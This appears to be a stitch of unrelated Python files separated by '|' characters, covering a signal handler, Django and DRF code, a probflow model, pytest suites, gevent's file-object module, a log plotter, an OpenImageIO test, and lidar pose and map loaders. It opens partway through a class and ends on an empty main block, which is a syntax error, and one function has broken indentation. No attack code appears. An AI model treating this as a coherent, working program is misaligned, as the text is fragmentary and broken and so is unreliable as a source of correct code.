self.callback = callback
def __enter__(self):
self.interrupted = False
self.released = False
self.original_handler = signal.getsignal(self.sig)
def _handler(signum, frame):
forward_signal = False
if not self.interrupted:
if self.callback:
try:
forward_signal = self.callback() == 'forward-signal'
except:
pass
self.interrupted = True
self.release()
if forward_signal:
self.original_handler()
signal.signal(self.sig, _handler)
return self
def __exit__(self, t, value, tb):
self.release()
if self.interrupted and self.resignal_on_exit:
os.kill(os.getpid(), self.sig)
def release(self):
if self.released:
return False
signal.signal(self.sig, self.original_handler)
self.released = True
return True
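# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): run a loop under the handler
# and stop gracefully on CTRL+C. Only the SignalHandler class above is needed.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    import time

    def on_interrupt():
        print('CTRL+C detected, finishing up...')
        # Returning the string 'forward-signal' would re-raise via the original handler.

    with SignalHandler(callback=on_interrupt) as handler:
        for _ in range(50):
            time.sleep(0.1)  # simulated work
            if handler.interrupted:
                break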
|
from django.views.generic import ListView
from django.shortcuts import render
from django.http import HttpResponse
from blog.views import CommonViewMinxin
from .models import Link
class LinkListView(CommonViewMinxin, ListView):
queryset = Link.objects.filter(status=Link.STATUS_NORMAL)
template_name = 'config/links.html'
context_object_name = 'link_list'
|
from typing import List
import probflow.utils.ops as O
from probflow.distributions import Normal
from probflow.models import ContinuousModel
from probflow.modules import DenseNetwork
from probflow.parameters import ScaleParameter
from probflow.utils.casting import to_tensor
class DenseRegression(ContinuousModel):
r"""A regression using a multilayer dense neural network
TODO: explain, math, diagram, examples, etc
Parameters
----------
d : List[int]
Dimensionality (number of units) for each layer.
The first element should be the dimensionality of the independent
variable (number of features), and the last element should be the
dimensionality of the dependent variable (number of dimensions of the
target).
heteroscedastic : bool
Whether to model a change in noise as a function of :math:`\mathbf{x}`
(if ``heteroscedastic=True``), or not (if ``heteroscedastic=False``,
the default).
activation : callable
Activation function to apply to the outputs of each layer.
Note that the activation function will not be applied to the outputs
of the final layer.
Default = :math:`\max ( 0, x )`
kwargs
Additional keyword arguments are passed to :class:`.DenseNetwork`
Attributes
----------
network : :class:`.DenseNetwork`
The multilayer dense neural network which generates predictions of the
mean
std : :class:`.ScaleParameter`
Standard deviation of the Normal observation distribution
"""
def __init__(self, d: List[int], heteroscedastic: bool = False, **kwargs):
self.heteroscedastic = heteroscedastic
if heteroscedastic:
self.d_out = d[-1]
d[-1] = 2 * d[-1]
self.network = DenseNetwork(d, **kwargs)
else:
self.network = DenseNetwork(d, **kwargs)
self.std = ScaleParameter([1, d[-1]], name="std")
def __call__(self, x):
x = to_tensor(x)
if self.heteroscedastic:
p = self.network(x)
m_preds = p[..., :, : self.d_out]
s_preds = O.exp(p[..., :, self.d_out :])
return Normal(m_preds, s_preds)
else:
return Normal(self.network(x), self.std())
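# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module). Assumes probflow is installed
# with a working backend and that its standard Model API (fit / predict) is
# available; the data below is synthetic and purely illustrative.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import numpy as np

    x = np.random.randn(256, 5).astype("float32")
    w = np.random.randn(5, 1).astype("float32")
    y = x @ w + 0.1 * np.random.randn(256, 1).astype("float32")

    model = DenseRegression([5, 32, 1])  # 5 features -> 32 hidden units -> 1 target
    model.fit(x, y, epochs=10)           # variational fit via probflow's Model API
    print(model.predict(x)[:5])          # posterior-mean predictions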
|
import pytest
from houston.configuration import Configuration, option
def test_option_construction():
class X(Configuration):
foo = option(int)
assert set(o.name for o in X.options) == {'foo'}
def test_constructor():
class X(Configuration):
foo = option(int)
conf = X(foo=0)
assert conf.foo == 0
with pytest.raises(TypeError, message="expected TypeError (no arguments)"):
assert X()
with pytest.raises(TypeError, message="expected TypeError (positional arguments are disallowed)"):
assert X(0)
with pytest.raises(TypeError, message="expected TypeError (erroneous property 'bar')"):
assert X(foo=0, bar=1)
class X(Configuration):
foo = option(int)
bar = option(int)
conf = X(foo=0, bar=1)
assert conf.foo == 0
assert conf.bar == 1
def test_hash():
class X(Configuration):
foo = option(int)
class Y(Configuration):
foo = option(int)
c1 = X(foo=0)
c2 = X(foo=1)
c3 = X(foo=0)
c4 = X(foo=1)
s = {c1, c2, c3, c4}
assert s == {X(foo=0), X(foo=1)}
c5 = Y(foo=0)
assert len({c1, c5}) == 2
with pytest.raises(Exception):
assert c1 != c5
def test_is_frozen():
class X(Configuration):
foo = option(int)
conf = X(foo=0)
with pytest.raises(AttributeError, message="expected AttributeError (can't set foo)"):
conf.foo = 10
def test_eq():
class X(Configuration):
foo = option(int)
bar = option(int)
class Y(Configuration):
foo = option(int)
bar = option(int)
assert X(foo=1, bar=2) == X(foo=1, bar=2)
assert X(foo=1, bar=2) != X(foo=2, bar=2)
assert X(foo=1, bar=2) != X(foo=1, bar=1)
with pytest.raises(Exception, message="expected Exception (confs have different parent classes)"):
assert X(foo=1, bar=2) == Y(foo=1, bar=2)
def test_to_and_from_dict():
class X(Configuration):
foo = option(int)
bar = option(int)
conf = X(foo=1, bar=2)
jsn = {'foo': 1, 'bar': 2}
assert conf.to_dict() == jsn
assert X.from_dict(jsn) == conf
|
from enum import Enum
from eth_utils import int_to_big_endian
from raidex.raidex_node.architecture.event_architecture import dispatch_events
from raidex.utils import pex
from raidex.utils.timestamp import to_str_repr, time_plus
from raidex.utils.random import create_random_32_bytes_id
from raidex.raidex_node.commitment_service.events import CommitEvent, CommitmentProvedEvent, ReceivedInboundEvent, CancellationRequestEvent
class TraderRole(Enum):
MAKER = 0
TAKER = 1
class OfferType(Enum):
BUY = 0
SELL = 1
@classmethod
def opposite(cls, type_):
return OfferType((type_.value + 1) % 2)
class BasicOffer:
def __init__(self, offer_id, offer_type, base_amount, quote_amount, timeout_date):
self.offer_id = offer_id
self.type = offer_type
self.base_amount = base_amount
self.quote_amount = quote_amount
self.timeout_date = timeout_date
@property
def price(self):
return float(self.quote_amount) / self.base_amount
def __repr__(self):
return "Offer<pex(id)={} amount={} price={} type={} timeout={}>".format(
pex(int_to_big_endian(self.offer_id)),
self.base_amount,
self.price,
self.type,
to_str_repr(self.timeout_date))
def __eq__(self, other):
if not isinstance(other, BasicOffer):
return False
if not self.offer_id == other.offer_id:
return False
if not self.type == other.type:
return False
if not self.base_amount == other.base_amount:
return False
if not self.quote_amount == other.quote_amount:
return False
if not self.timeout_date == other.timeout_date:
return False
return True
class Offer(BasicOffer):
def __init__(self, offer_id, offer_type, base_amount, quote_amount, timeout_date, trader_role):
super(Offer, self).__init__(offer_id, offer_type, base_amount, quote_amount, timeout_date)
self.trader_role = trader_role
self.proof = None
@property
def buy_amount(self):
if self.is_buy():
return self.base_amount
return self.quote_amount
@property
def sell_amount(self):
if self.is_buy():
return self.quote_amount
return self.base_amount
def is_maker(self):
if self.trader_role == TraderRole.MAKER:
return True
return False
def is_buy(self):
if self.type == OfferType.BUY:
return True
return False
def is_sell(self):
return not self.is_buy()
@property
def has_proof(self):
if self.proof:
return True
return False
def on_enter_unproved(self):
dispatch_events([CommitEvent(offer=self)])
def set_proof(self, proof):
self.proof = proof
def on_enter_published(self):
dispatch_events([CommitmentProvedEvent(offer=self)])
def initiate_refund(self, raiden_event):
dispatch_events([ReceivedInboundEvent(offer=self, raiden_event=raiden_event)])
def on_enter_cancellation(self):
dispatch_events([CancellationRequestEvent(offer=self)])
def log_state(self, *args):
if hasattr(self, 'state'):
print(f'Offer {self.offer_id} - State Changed to: {self.state}')
if hasattr(self, 'status'):
print(f'Status: {self.status}')
class OfferFactory:
@staticmethod
def create_offer(offer_type, base_amount, quote_amount, offer_lifetime, trader_role):
new_offer_id = create_random_32_bytes_id()
timeout_date = time_plus(seconds=offer_lifetime)
offer_model = Offer(new_offer_id,
offer_type,
base_amount,
quote_amount,
timeout_date,
trader_role)
from raidex.raidex_node.order import fsm_offer
fsm_offer.add_model(offer_model)
return offer_model
@staticmethod
def create_from_basic(offer, trader_role):
offer_model = Offer(offer.offer_id,
offer.type,
offer.base_amount,
offer.quote_amount,
offer.timeout_date,
trader_role)
from raidex.raidex_node.order import fsm_offer
fsm_offer.add_model(offer_model)
return offer_model
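# ---------------------------------------------------------------------------
# Minimal sketch of the plain data classes above (not part of the original
# module). It only exercises BasicOffer and OfferType, so no state machine or
# event dispatching is touched; it assumes the raidex helpers imported at the
# top of this file behave as they do in OfferFactory.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    offer = BasicOffer(
        offer_id=create_random_32_bytes_id(),
        offer_type=OfferType.BUY,
        base_amount=100,
        quote_amount=50,
        timeout_date=time_plus(seconds=60),
    )
    print(offer)                           # uses BasicOffer.__repr__
    print(offer.price)                     # 0.5
    print(OfferType.opposite(offer.type))  # OfferType.SELL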
|
from __future__ import absolute_import, with_statement
import sys
import os
from gevent.hub import get_hub
from gevent.socket import EBADF
from gevent.os import _read, _write, ignored_errors
from gevent.lock import Semaphore, DummySemaphore
try:
from fcntl import fcntl, F_SETFL
except ImportError:
fcntl = None
__all__ = ['FileObjectPosix',
'FileObjectThread',
'FileObject']
if fcntl is None:
__all__.remove('FileObjectPosix')
else:
from gevent.socket import _fileobject, _get_memory
cancel_wait_ex = IOError(EBADF, 'File descriptor was closed in another greenlet')
from gevent.os import make_nonblocking
try:
from gevent._util import SocketAdapter__del__, noop
except ImportError:
SocketAdapter__del__ = None
noop = None
from types import UnboundMethodType
class NA(object):
def __repr__(self):
return 'N/A'
NA = NA()
class SocketAdapter(object):
"""Socket-like API on top of a file descriptor.
The main purpose of it is to re-use _fileobject to create proper cooperative file objects
from file descriptors on POSIX platforms.
"""
def __init__(self, fileno, mode=None, close=True):
if not isinstance(fileno, (int, long)):
raise TypeError('fileno must be int: %r' % fileno)
self._fileno = fileno
self._mode = mode or 'rb'
self._close = close
self._translate = 'U' in self._mode
make_nonblocking(fileno)
self._eat_newline = False
self.hub = get_hub()
io = self.hub.loop.io
self._read_event = io(fileno, 1)
self._write_event = io(fileno, 2)
def __repr__(self):
if self._fileno is None:
return '<%s at 0x%x closed>' % (self.__class__.__name__, id(self))
else:
args = (self.__class__.__name__, id(self), getattr(self, '_fileno', NA), getattr(self, '_mode', NA))
return '<%s at 0x%x (%r, %r)>' % args
def makefile(self, *args, **kwargs):
return _fileobject(self, *args, **kwargs)
def fileno(self):
result = self._fileno
if result is None:
raise IOError(EBADF, 'Bad file descriptor (%s object is closed)' % self.__class__.__name__)
return result
def detach(self):
x = self._fileno
self._fileno = None
return x
def close(self):
self.hub.cancel_wait(self._read_event, cancel_wait_ex)
self.hub.cancel_wait(self._write_event, cancel_wait_ex)
fileno = self._fileno
if fileno is not None:
self._fileno = None
if self._close:
os.close(fileno)
def sendall(self, data):
fileno = self.fileno()
bytes_total = len(data)
bytes_written = 0
while True:
try:
bytes_written += _write(fileno, _get_memory(data, bytes_written))
except (IOError, OSError):
code = sys.exc_info()[1].args[0]
if code not in ignored_errors:
raise
sys.exc_clear()
if bytes_written >= bytes_total:
return
self.hub.wait(self._write_event)
def recv(self, size):
while True:
try:
data = _read(self.fileno(), size)
except (IOError, OSError):
code = sys.exc_info()[1].args[0]
if code not in ignored_errors:
raise
sys.exc_clear()
else:
if not self._translate or not data:
return data
if self._eat_newline:
self._eat_newline = False
if data.startswith('\n'):
data = data[1:]
if not data:
return self.recv(size)
if data.endswith('\r'):
self._eat_newline = True
return self._translate_newlines(data)
self.hub.wait(self._read_event)
def _translate_newlines(self, data):
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
return data
if not SocketAdapter__del__:
def __del__(self, close=os.close):
fileno = self._fileno
if fileno is not None:
close(fileno)
if SocketAdapter__del__:
SocketAdapter.__del__ = UnboundMethodType(SocketAdapter__del__, None, SocketAdapter)
class FileObjectPosix(_fileobject):
def __init__(self, fobj, mode='rb', bufsize=-1, close=True):
if isinstance(fobj, (int, long)):
fileno = fobj
fobj = None
else:
fileno = fobj.fileno()
sock = SocketAdapter(fileno, mode, close=close)
self._fobj = fobj
self._closed = False
_fileobject.__init__(self, sock, mode=mode, bufsize=bufsize, close=close)
def __repr__(self):
if self._sock is None:
return '<%s closed>' % self.__class__.__name__
elif self._fobj is None:
return '<%s %s>' % (self.__class__.__name__, self._sock)
else:
return '<%s %s _fobj=%r>' % (self.__class__.__name__, self._sock, self._fobj)
def close(self):
if self._closed:
# make sure close() is only run once when called concurrently
# cannot rely on self._sock for this because we need to keep that until flush() is done
return
self._closed = True
sock = self._sock
if sock is None:
return
try:
self.flush()
finally:
if self._fobj is not None or not self._close:
sock.detach()
self._sock = None
self._fobj = None
def __getattr__(self, item):
assert item != '_fobj'
if self._fobj is None:
raise FileObjectClosed
return getattr(self._fobj, item)
if not noop:
def __del__(self):
# disable _fileobject's __del__
pass
if noop:
FileObjectPosix.__del__ = UnboundMethodType(noop, None, FileObjectPosix)
class FileObjectThread(object):
def __init__(self, fobj, *args, **kwargs):
self._close = kwargs.pop('close', True)
self.threadpool = kwargs.pop('threadpool', None)
self.lock = kwargs.pop('lock', True)
if kwargs:
raise TypeError('Unexpected arguments: %r' % kwargs.keys())
if self.lock is True:
self.lock = Semaphore()
elif not self.lock:
self.lock = DummySemaphore()
if not hasattr(self.lock, '__enter__'):
raise TypeError('Expected a Semaphore or boolean, got %r' % type(self.lock))
if isinstance(fobj, (int, long)):
if not self._close:
# we cannot do this, since fdopen object will close the descriptor
raise TypeError('FileObjectThread does not support close=False')
fobj = os.fdopen(fobj, *args)
self._fobj = fobj
if self.threadpool is None:
self.threadpool = get_hub().threadpool
def _apply(self, func, args=None, kwargs=None):
with self.lock:
return self.threadpool.apply_e(BaseException, func, args, kwargs)
def close(self):
fobj = self._fobj
if fobj is None:
return
self._fobj = None
try:
self.flush(_fobj=fobj)
finally:
if self._close:
fobj.close()
def flush(self, _fobj=None):
if _fobj is not None:
fobj = _fobj
else:
fobj = self._fobj
if fobj is None:
raise FileObjectClosed
return self._apply(fobj.flush)
def __repr__(self):
return '<%s _fobj=%r threadpool=%r>' % (self.__class__.__name__, self._fobj, self.threadpool)
def __getattr__(self, item):
assert item != '_fobj'
if self._fobj is None:
raise FileObjectClosed
return getattr(self._fobj, item)
for method in ['read', 'readinto', 'readline', 'readlines', 'write', 'writelines', 'xreadlines']:
exec '''def %s(self, *args, **kwargs):
fobj = self._fobj
if fobj is None:
raise FileObjectClosed
return self._apply(fobj.%s, args, kwargs)
''' % (method, method)
def __iter__(self):
return self
def next(self):
line = self.readline()
if line:
return line
raise StopIteration
FileObjectClosed = IOError(EBADF, 'Bad file descriptor (FileObject was closed)')
try:
FileObject = FileObjectPosix
except NameError:
FileObject = FileObjectThread
class FileObjectBlock(object):
def __init__(self, fobj, *args, **kwargs):
self._close = kwargs.pop('close', True)
if kwargs:
raise TypeError('Unexpected arguments: %r' % kwargs.keys())
if isinstance(fobj, (int, long)):
if not self._close:
# we cannot do this, since fdopen object will close the descriptor
raise TypeError('FileObjectBlock does not support close=False')
fobj = os.fdopen(fobj, *args)
self._fobj = fobj
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self._fobj)
def __getattr__(self, item):
assert item != '_fobj'
if self._fobj is None:
raise FileObjectClosed
return getattr(self._fobj, item)
config = os.environ.get('GEVENT_FILE')
if config:
klass = {'thread': 'gevent.fileobject.FileObjectThread',
'posix': 'gevent.fileobject.FileObjectPosix',
'block': 'gevent.fileobject.FileObjectBlock'}.get(config, config)
if klass.startswith('gevent.fileobject.'):
FileObject = globals()[klass.split('.', 2)[-1]]
else:
from gevent.hub import _import
FileObject = _import(klass)
del klass
|
import urllib.request
import time
def check_website(website, timeout=30):
startTime = time.time()
while time.time() - startTime <= timeout:
try:
print(urllib.request.urlopen(website).getcode())
return True
except:
pass
return False
if __name__ == "__main__":
website = "https://www.stackoverflow.com"
plugin_website = "http://127.0.0.1:8051/"
print(check_website(plugin_website, timeout=120))
|
from rest_framework import serializers
from lotus_dashboard.models import *
class DashboardColumnSerializer(serializers.ModelSerializer):
class Meta:
model = DashboardColumn
fields = ('id', 'site', 'columns')
class CapUpdateResultSerializer(serializers.ModelSerializer):
class Meta:
model = CapUpdateResult
fields = ('id', 'from_date', 'to_date', 'crm', 'result', 'updated_at')
class OfferSerializer(serializers.ModelSerializer):
class Meta:
model = Offer
fields = ('id', 'crm', 'name', 'label', 'type', 's1_payout', 's2_payout', 'step1')
class AffiliateSerializer(serializers.ModelSerializer):
class Meta:
model = Affiliate
fields = ('id', 'name', 'afid', 'code', 'bot')
class BillingAffiliateSerializer(serializers.ModelSerializer):
class Meta:
model = BillingAffiliate
fields = ('id', 'name', 'afid')
|
"""
Given a logfile, plot a graph
"""
import json
import argparse
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
plt.switch_backend('agg')
def plot_value(logfile, min_y, max_y, title, max_x, value_key, out_file):
epoch = []
reward = []
with open(logfile, 'r') as f:
for n, line in enumerate(f):
if n == 0:
line = line.replace('meta: ', '').strip()
meta = json.loads(line)
continue # skip first line
line = line.strip()
if line == '':
continue
d = json.loads(line)
if max_x is not None and d['episode'] > max_x:
continue
epoch.append(int(d['episode']))
v = float(d[value_key])
if 'version' not in d:
v /= meta['batch_size']
reward.append(v)
while len(epoch) > 200:
new_epoch = []
new_reward = []
for n in range(len(epoch) // 2):
r = (reward[n * 2] + reward[n * 2 + 1]) / 2
e = epoch[n] * 2
new_epoch.append(e)
new_reward.append(r)
epoch = new_epoch
reward = new_reward
if min_y is None:
min_y = 0
if max_y is not None:
plt.ylim([min_y, max_y])
plt.plot(np.array(epoch), reward, label=value_key)
if title is not None:
plt.title(title)
else:
plt.title(f'{value_key} food={meta["enable_food"]} cactus={meta["enable_cactus"]}')
plt.xlabel('Episode')
plt.ylabel(value_key)
plt.legend()
plt.savefig(out_file)
def plot_multiple_files(logfiles, min_y, max_y, title, label, max_x, value_key, out_file):
for logfile in logfiles.split(','):
epoch = []
reward = []
with open(logfile, 'r') as f:
for n, line in enumerate(f):
if n == 0:
line = line.replace('meta: ', '')
print('line', line)
meta = json.loads(line)
print('meta', meta)
continue
line = line.strip()
if line == '':
continue
d = json.loads(line)
if max_x is not None and d['episode'] > max_x:
continue
epoch.append(int(d['episode']))
reward.append(float(d[value_key]))
while len(epoch) > 200:
new_epoch = []
new_reward = []
for n in range(len(epoch) // 2):
r = (reward[n * 2] + reward[n * 2 + 1]) / 2
e = epoch[n] * 2
new_epoch.append(e)
new_reward.append(r)
epoch = new_epoch
reward = new_reward
if min_y is None:
min_y = 0
if max_y is not None:
plt.ylim([min_y, max_y])
plt.plot(np.array(epoch) / 1000, reward, label=label.format(**meta))
if title is not None:
plt.title(title)
plt.xlabel('Episodes of 128 games (thousands)')
plt.ylabel(value_key.replace('_', ' '))
plt.legend()
plt.savefig(out_file)
def plot_multiple_keys(logfile, title, step_key, value_keys, out_file):
# epoch = []
rows = []
with open(logfile, 'r') as f:
for n, line in enumerate(f):
if n == 0:
line = line.replace('meta: ', '').strip()
meta = json.loads(line)
continue # skip first line
line = line.strip()
if line == '':
continue
d = json.loads(line)
rows.append(d)
average_over = 1
while len(rows) // average_over > 200:
average_over *= 2
print('average_over', average_over)
averaged_rows = []
summed_row = {}
this_count = 0
epochs = []
value_keys = value_keys.split(',')
# this_epoch = rows[0]['episode']
for row in rows:
for k in value_keys:
if k not in summed_row:
epoch = row[step_key]
summed_row[k] = row[k]
else:
summed_row[k] += row[k]
this_count += 1
if this_count >= average_over:
averaged_row = {}
for k, v in summed_row.items():
averaged_row[k] = summed_row[k] / average_over
averaged_rows.append(averaged_row)
epochs.append(epoch)
summed_row = {}
this_count = 0
values_by_key = defaultdict(list)
for row in averaged_rows:
for k in value_keys:
# print('values_by_key[k]', values_by_key[k])
# print('row', row)
# print('row[k]', row[k])
values_by_key[k].append(row[k])
# max_by_key = {}
# min_by_key = {}
# for key, values in values_by_key.items():
# max_by_key[key] = np.max(values)
# min_by_key[key] = np.min(values)
# print('max_by_key', max_by_key)
# for key, values in values_by_key.items():
# # if max_by_key[key] > 0:
# this_max = max_by_key[key]
# this_min = min_by_key[key]
# new_values = [(v - this_min) / (this_max - this_min) for v in values]
# values_by_key[key] = new_values
# for k in value_keys:
# plt.plot(np.array(epochs), values_by_key[k], label=k)
# if title is not None:
# plt.title(title)
for i, k in enumerate(value_keys):
print(i, k)
plt.subplot(len(value_keys), 1, i + 1)
plt.plot(np.array(epochs), values_by_key[k], label=k)
plt.xlabel(step_key)
plt.ylabel(k)
plt.legend()
plt.savefig(out_file)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parsers = parser.add_subparsers()
parser_ = parsers.add_parser('plot-value')
parser_.add_argument('--logfile', type=str, required=True)
parser_.add_argument('--max-x', type=int)
parser_.add_argument('--min-y', type=float)
parser_.add_argument('--max-y', type=float)
parser_.add_argument('--value-key', type=str, default='average_reward')
parser_.add_argument('--title', type=str)
# plot_value() requires an out_file argument, so expose it for this subcommand too
parser_.add_argument('--out-file', type=str, default='/tmp/out-{value_key}.png')
parser_.set_defaults(func=plot_value)
parser_ = parsers.add_parser('plot-multiple-files')
parser_.add_argument('--logfiles', type=str, required=True)
parser_.add_argument('--max-x', type=int)
parser_.add_argument('--min-y', type=float)
parser_.add_argument('--max-y', type=float)
parser_.add_argument('--label', type=str, default='tau={tau}')
parser_.add_argument('--value-key', type=str, default='average_reward')
parser_.add_argument('--out-file', type=str, default='/tmp/out-{value_key}.png')
parser_.add_argument('--title', type=str)
parser_.set_defaults(func=plot_multiple_files)
parser_ = parsers.add_parser('plot-multiple-keys')
parser_.add_argument('--logfile', type=str, required=True)
parser_.add_argument('--step-key', type=str, default='episode')
parser_.add_argument('--value-keys', type=str, default='average_reward')
parser_.add_argument('--out-file', type=str, default='tmp_plots/out.png')
parser_.add_argument('--title', type=str)
parser_.set_defaults(func=plot_multiple_keys)
args = parser.parse_args()
func = args.func
args_dict = args.__dict__
args.out_file = args.out_file.format(**args.__dict__)
del args_dict['func']
func(**args_dict)
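# Example invocations of the subcommands defined above (the script filename
# "plot_log.py" and the logfile paths are hypothetical):
#   python plot_log.py plot-value --logfile /tmp/train.log --value-key average_reward
#   python plot_log.py plot-multiple-keys --logfile /tmp/train.log \
#       --value-keys average_reward,loss --out-file tmp_plots/out.png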
|
#!/usr/bin/env python
import OpenImageIO as oiio
# Print the contents of an ImageSpec
def print_imagespec (spec, subimage=0, mip=0, msg="") :
if msg != "" :
print str(msg)
if spec.depth <= 1 :
print (" resolution %dx%d%+d%+d" % (spec.width, spec.height, spec.x, spec.y))
else :
print (" resolution %dx%d%x%d+d%+d%+d" % (spec.width, spec.height, spec.depth, spec.x, spec.y, spec.z))
if (spec.width != spec.full_width or spec.height != spec.full_height
or spec.depth != spec.full_depth) :
if spec.full_depth <= 1 :
print (" full res %dx%d%+d%+d" % (spec.full_width, spec.full_height, spec.full_x, spec.full_y))
else :
print (" full res %dx%d%x%d+d%+d%+d" % (spec.full_width, spec.full_height, spec.full_depth, spec.full_x, spec.full_y, spec.full_z))
if spec.tile_width :
print (" tile size %dx%dx%d" % (spec.tile_width, spec.tile_height, spec.tile_depth))
else :
print " untiled"
if mip >= 1 :
return
print " " + str(spec.nchannels), "channels:", spec.channelnames
print " format = ", str(spec.format)
if spec.channelformats :
print " channelformats = ", spec.channelformats
print " alpha channel = ", spec.alpha_channel
print " z channel = ", spec.z_channel
print " deep = ", spec.deep
for i in range(len(spec.extra_attribs)) :
if type(spec.extra_attribs[i].value) == str :
print " ", spec.extra_attribs[i].name, "= \"" + spec.extra_attribs[i].value + "\""
else :
print " ", spec.extra_attribs[i].name, "=", spec.extra_attribs[i].value
######################################################################
# main test starts here
try:
print "Constructing to be a writeable 320x240,4 UINT16:"
b = oiio.ImageBuf (oiio.ImageSpec(320,240,4,oiio.UINT16))
print_imagespec (b.spec())
print "Resetting to be a writeable 640x480,3 Float:"
b.reset (oiio.ImageSpec(640,480,3,oiio.FLOAT))
print_imagespec (b.spec())
print ""
# Test reading from disk
print "Testing read of grid.tx:"
b = oiio.ImageBuf ("../../../../../oiio-images/grid.tx")
print "subimage:", b.subimage, " / ", b.nsubimages
print "miplevel:", b.miplevel, " / ", b.nmiplevels
print "channels:", b.nchannels
print "name:", b.name
print "file_format_name:", b.file_format_name
print "deep:", b.deep
print "orientation:", b.orientation
print "oriented x,y,width,height:", b.oriented_x, b.oriented_y, b.oriented_width, b.oriented_height
print "oriented full x,y,width,height:", b.oriented_full_x, b.oriented_full_y, b.oriented_full_width, b.oriented_full_height
print "xyz beg/end:", b.xbegin, b.xend, b.ybegin, b.yend, b.zbegin, b.zend
print "xyz min/max:", b.xmin, b.xmax, b.ymin, b.ymax, b.zmin, b.zmax
print "setting full res..."
b.set_full (0, 2048, 0, 2048, 0, 1)
print "roi =", b.roi
print "full roi =", b.roi_full
print "setting full roi again, as ROI..."
b.roi_full = oiio.ROI(0, 1024, 0, 1024, 0, 1, 0, b.nchannels)
print "Printing the whole spec to be sure:"
print_imagespec (b.spec())
print ""
print "Resetting to a different MIP level:"
b.reset ("../../../../../oiio-images/grid.tx", 0, 2)
print_imagespec (b.spec())
print ""
# Create a small buffer, do various pixel reads and writes
print "Making 2x2 RGBK image:"
b = oiio.ImageBuf (oiio.ImageSpec(2,2,3,oiio.UINT8))
print_imagespec (b.spec())
b.setpixel (0, 0, 0, (1.0, 0.0, 0.0))
b.setpixel (1, 0, 0, (0.0, 1.0, 0.0))
b.setpixel (0, 1, 0, (0.0, 0.0, 1.0))
b.setpixel (1, 1, 0, (0.0, 0.0, 0.0))
print "Pixel 0,0 is", b.getpixel(0,0,0)
print "Pixel 1,0 is", b.getpixel(1,0) # test 2D lookup
print "Pixel 0,1 is", b.getpixel(0,1)
print "Interpolating 1,0.5 ->", b.interppixel(1,0.5)
print "Interpolating NDC 0.25,0.5 ->", b.interppixel_NDC(0.25,0.5)
print ""
print "Saving file..."
b.write ("out.tif")
print "Done."
except Exception as detail:
print "Unknown exception:", detail
|
from unittest import TestCase
from phi import math, geom
from phi.geom import Box, Sphere
from phi.math import batch, channel, spatial
class TestGeom(TestCase):
def test_box_constructor(self):
box = Box(0, (1, 1))
math.assert_close(box.size, 1)
self.assertEqual(math.spatial(x=1, y=1), box.shape)
def test_box_batched(self):
box = Box(math.tensor([(0, 0), (1, 1)], batch('boxes'), channel('vector')), 1)
self.assertEqual(math.batch(boxes=2) & spatial(x=1, y=1), box.shape)
def test_box_volume(self):
box = Box(math.tensor([(0, 0), (1, 1)], batch('boxes'), channel('vector')), 1)
math.assert_close(box.volume, [1, 0])
def test_sphere_volume(self):
sphere = Sphere(math.tensor([(0, 0), (1, 1)], batch('batch'), channel('vector')), radius=math.tensor([1, 2], batch('batch')))
math.assert_close(sphere.volume, [4/3 * math.PI, 4/3 * math.PI * 8])
def test_stack_volume(self):
u = geom.stack([Box[0:1, 0:1], Box[0:2, 0:2]], batch('batch'))
math.assert_close(u.volume, [1, 4])
def test_stack_type(self):
bounds1 = Box[0:1, 0:1]
bounds2 = Box[0:10, 0:10]
bounds = geom.stack([bounds1, bounds2], batch('batch'))
self.assertIsInstance(bounds, Box)
def test_union_same(self):
union = geom.union(Box[0:1, 0:1], Box[2:3, 0:1])
self.assertIsInstance(union, Box)
math.assert_close(union.approximate_signed_distance((0, 0)), union.approximate_signed_distance((3, 1)), 0)
math.assert_close(union.approximate_signed_distance((1.5, 0)), 0.5)
def test_union_varying(self):
box = Box[0:1, 0:1]
sphere = Sphere((0, 0), radius=1)
union = geom.union(box, sphere)
math.assert_close(union.approximate_signed_distance((1, 1)), union.approximate_signed_distance((0, -1)), 0)
|
import numpy as np
import msgpack
def toCameraCoord(pose_mat):
"""
Convert the pose of lidar coordinate to camera coordinate
"""
R_C2L = np.array([[0, 0, 1, 0],
[-1, 0, 0, 0],
[0, -1, 0, 0],
[0, 0, 0, 1]])
inv_R_C2L = np.linalg.inv(R_C2L)
R = np.dot(inv_R_C2L, pose_mat)
rot = np.dot(R, R_C2L)
return rot
def cull_map(map_points, ceiling, floor):
"""
    Removes points above the ceiling and below the floor so that, when the cloud is plotted in the horizontal
    plane, points on the ceiling and floor are cut out for a cleaner map
:param floor: Threshold below which map points will be removed
:param ceiling: Threshold above which map points will be removed
:param map_points: Point cloud
:return: culled map
"""
culled_map = []
for i in range(len(map_points)):
point = map_points[i]
if ceiling > point[1] > floor:
culled_map.append(point)
return culled_map
def load_map(map_path):
"""
Loads the map for use in the report generation
:param: map_path path to the map.msg file
:returns: map
"""
# Read file as binary and unpack data using MessagePack library
with open(map_path, "rb") as f:
data = msgpack.unpackb(f.read(), use_list=False, raw=False)
# The point data is tagged "landmarks"
landmarks = data["landmarks"]
map_points_list = []
for _, point in landmarks.items():
map_points_list.append(np.block([np.asarray(point["pos_w"]), 1.0]))
# y is in the down direction so we flip it
map_points = np.asfarray(map_points_list) * np.array([1, -1, 1, 1])
return map_points
def load_poses(file_name, to_camera_coord=False):
"""
Each line in the file should follow the following structure
pose(3x4 matrix in terms of 12 numbers)
:param file_name: Path to file
    :param to_camera_coord: Whether to convert the poses to camera coordinates
:return: Numpy array of trajectory points n x [x, y, z]
"""
f = open(file_name, 'r')
s = f.readlines()
f.close()
poses = []
for cnt, line in enumerate(s):
P = np.eye(4)
line_split = [float(i) for i in line.split()]
for row in range(3):
for col in range(4):
P[row, col] = line_split[row * 4 + col]
        if to_camera_coord:
            poses.append(toCameraCoord(P))
else:
poses.append(P)
trajectory = np.asarray(poses)
# y is in the down direction so we flip it
trajectory = trajectory[:, :, 3] * np.array([1, -1, 1, 1])
return trajectory
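# --- Usage sketch (illustrative only) ---
# Shows how the helpers above are assumed to fit together; "map.msg" and
# "poses.txt" are placeholder paths, and the ceiling/floor thresholds are
# arbitrary example values in the same (flipped-y) frame as load_map's output.
if __name__ == "__main__":
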